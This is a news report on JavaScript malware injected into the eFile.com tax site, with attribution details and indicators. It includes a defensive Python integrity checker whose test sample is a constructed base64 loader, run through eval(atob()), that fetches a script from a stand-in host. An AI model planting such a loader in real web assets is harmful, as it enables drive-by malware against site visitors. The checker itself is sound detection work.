Suspected Chinese Threat Actors Infected IRS Authorized Tax Return Website With JavaScript Malware

An Internal Revenue Service (IRS) authorized tax return website was exploited to serve JavaScript malware for several weeks.

The malicious JavaScript code displayed an SSL error message on a fake “network error” page with an ‘update browser’ link that initiated malware download. Clicking the link downloaded two malicious executables, ‘update.exe’ for Chromium browsers and ‘installer.exe’ for Firefox.

Multiple eFile.com users posted on a Reddit thread on March 17 requesting confirmation from other Reddit users whether the network error message was legitimate.

Authorized tax return software compromised using stealthy JavaScript malware

Hackers inserted base64-encoded JavaScript malware code by modifying a Bootstrap add-on ‘popper.js’ (used for displaying tooltips and popovers) and loaded the script on almost every page.

“Someone took the normal and harmless popper.js and added obfuscated JavaScript to connect to infoamanewonliag[.]online,” said SANS Internet Storm Center researcher Dr Johannes Ullrich.

The campaign also leveraged another JavaScript file, ‘update.js’, that displayed the fake SSL error message, which was a base64-encoded string. The file, which was loaded from an Amazon AWS endpoint, also initiated the malware download process.

According to MalwareHunterTeam security researchers, the executable binaries were Windows backdoors written in the PHP programming language.

The PHP scripts persistently executed in the background and connected to a command and control (C2) server every ten seconds to receive an execution command. The malicious PHP scripts supported code execution, file download, and scheduling execution.

Seemingly, the JavaScript malware campaign did not target the tax return software users’ personal information. However, threat actors could leverage the backdoors to maintain persistence, download additional payloads, spread laterally in corporate networks, and steal users’ credentials for subsequent sophisticated attacks.

The JavaScript malware also only targeted the third-party tax return software service, not the official IRS e-file infrastructure. Likely, the hacking campaign intended to capitalize on the stressful tax return season to distribute malware for future attacks.

“Tax filing services and their customers are prime targets for cybercriminals in the peak of their busiest season of the year,” said Zane Bond, Head of Product at Keeper Security. “This is not unexpected as bad actors often leverage significant events to launch their malicious attacks.”

John Bambenek, Principal Threat Hunter at Netenrich, said the presence of a malicious JavaScript file during the stressful tax season was worrying.

“Anything used in filing tax returns is highly sensitive,” he said. “Considering malicious JavaScript was present for an extended period of time, this is quite concerning.”

Bambenek faulted the tax return website operator for failing to detect code modification in production.

“Attackers know that tax fraud is a lucrative business with billions lost annually, and that changes were made to a production website that were not detected, means some basic detections were not present,” noted Bambenek.
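The two points above, the base64-encoded loader appended to an otherwise legitimate popper.js and the absence of any check that would notice a production asset changing, can be addressed with one routine deployment control: record a digest of every static script at deploy time, compare what the web server is actually serving against that baseline, and run a content heuristic over anything that differs. The following Python script is an added example written for this article, not code from eFile.com, SANS or any vendor named here; the popper.js fragment, the injected loader and the `update.example.invalid` URL are constructed samples, and `sri_hash`, `check_assets` and `suspicious_indicators` are hypothetical helper names.

```python
import base64
import binascii
import hashlib
import re

# Constructed sample assets (not the real eFile.com files): a harmless
# popper.js fragment and a copy with a base64-encoded loader appended,
# modelled on the injection described above.
CLEAN_POPPER = (
    "/*! Popper.js fragment (constructed sample) */\n"
    "var Popper=function(){function a(b){return b.getBoundingClientRect()}return{rect:a}}();\n"
)

# Hypothetical second-stage URL; '.invalid' is a reserved TLD that never resolves.
_INJECTED_SOURCE = (
    "var s=document.createElement('script');"
    "s.src='https://update.example.invalid/update.js';"
    "document.head.appendChild(s);"
)
TAMPERED_POPPER = CLEAN_POPPER + (
    "eval(atob('" + base64.b64encode(_INJECTED_SOURCE.encode()).decode() + "'));\n"
)


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity style digest, '<algo>-<base64 digest>', usable
    both as a baseline record and as an HTML integrity= attribute value."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def build_baseline(assets: dict) -> dict:
    """Record the digest of every asset at deploy time (path -> digest)."""
    return {path: sri_hash(data) for path, data in assets.items()}


def check_assets(assets: dict, baseline: dict) -> list:
    """Compare what is currently served with the deploy-time baseline.
    Returns (kind, path) tuples: 'modified', 'unknown' (not in baseline)
    or 'missing' (in baseline but no longer served)."""
    findings = []
    for path, data in assets.items():
        expected = baseline.get(path)
        if expected is None:
            findings.append(("unknown", path))
        elif sri_hash(data) != expected:
            findings.append(("modified", path))
    for path in baseline:
        if path not in assets:
            findings.append(("missing", path))
    return findings


# A run of 64+ base64 characters is rare in minified code, which is broken
# up by punctuation every few characters; it is common in encoded payloads.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
_DYNAMIC_EVAL = re.compile(r"\b(?:eval|atob|Function)\s*\(")


def _looks_like_text(raw: bytes) -> bool:
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in raw)
    return len(raw) > 0 and printable / len(raw) > 0.95


def suspicious_indicators(source: str) -> list:
    """Content heuristics for the pattern in this campaign: a long base64
    run that decodes to script or a URL, next to eval/atob/Function."""
    findings = []
    for match in _B64_RUN.finditer(source):
        try:
            decoded = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, e.g. a long identifier
        if _looks_like_text(decoded):
            text = decoded.decode("ascii", errors="replace")
            if re.search(r"https?://|document\.|<script", text):
                findings.append(("embedded-base64-script", text[:60]))
    for match in _DYNAMIC_EVAL.finditer(source):
        findings.append(("dynamic-eval", match.group(0).strip()))
    return findings


def audit(assets: dict, baseline: dict) -> dict:
    """Integrity diff plus content heuristics on every changed or new file."""
    report = {"integrity": check_assets(assets, baseline), "indicators": {}}
    for kind, path in report["integrity"]:
        if kind in ("modified", "unknown"):
            source = assets[path].decode("utf-8", errors="replace")
            report["indicators"][path] = suspicious_indicators(source)
    return report


if __name__ == "__main__":
    deployed = {"js/popper.js": CLEAN_POPPER.encode()}
    baseline = build_baseline(deployed)          # taken at deploy time
    served = {"js/popper.js": TAMPERED_POPPER.encode()}  # fetched later
    for key, value in audit(served, baseline).items():
        print(key, value)
```

The baseline belongs in the CI/CD system or a read-only store, not on the web server the attacker has write access to, and the comparison should run from outside (fetching the files over HTTPS as a browser would) on a schedule measured in minutes, since the article's point is that the injected code went unnoticed for weeks. The `sri_hash` value is also what the `integrity` attribute on a `<script>` tag expects, so the same baseline can pin scripts in the page markup.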

Interestingly, only two antivirus engines on Google’s VirusTotal (CrowdStrike Falcon and Cynet) detected the two Windows executables as malicious.

JavaScript malware campaign attributed to a Chinese threat actor

SANS researcher Ullrich discovered that the files were signed with a valid digital certificate from Sichuan Niurui Science and Technology Co., Ltd.

He also noted that the website hosting the malicious executables infoamanewonliag[.]online resolved to a Tokyo, Japan-based IP address, 47.245.6.91, hosted by Alibaba. Similarly, the payloads established connections with the same IP address, suggesting it hosted a C2 server.

The SANS researcher attributed the attack to a Chinese threat actor, who also attempted to remove the JavaScript malware before eFile.com operators cleaned the website.

Given their clumsy but effective hacking plot, this clean-up operation was likely an attempt to cover their tracks and avoid detection.

“Some of the attack infrastructure is hosted with Alibaba in China, and some Chinese comments are in the code. So probably someone Chinese. The code is very cobbled together, and the clumsy inclusion of PHP points to a not-so-advanced, but maybe still persistent, threat actor,” Ullrich suggested.

The tax return website operators have not publicly responded to the attack, and the number of victims is unknown. With approximately 1.1 million people visiting the tax return website and the urgency of filing tax returns, the malware campaign most likely affected a significant number.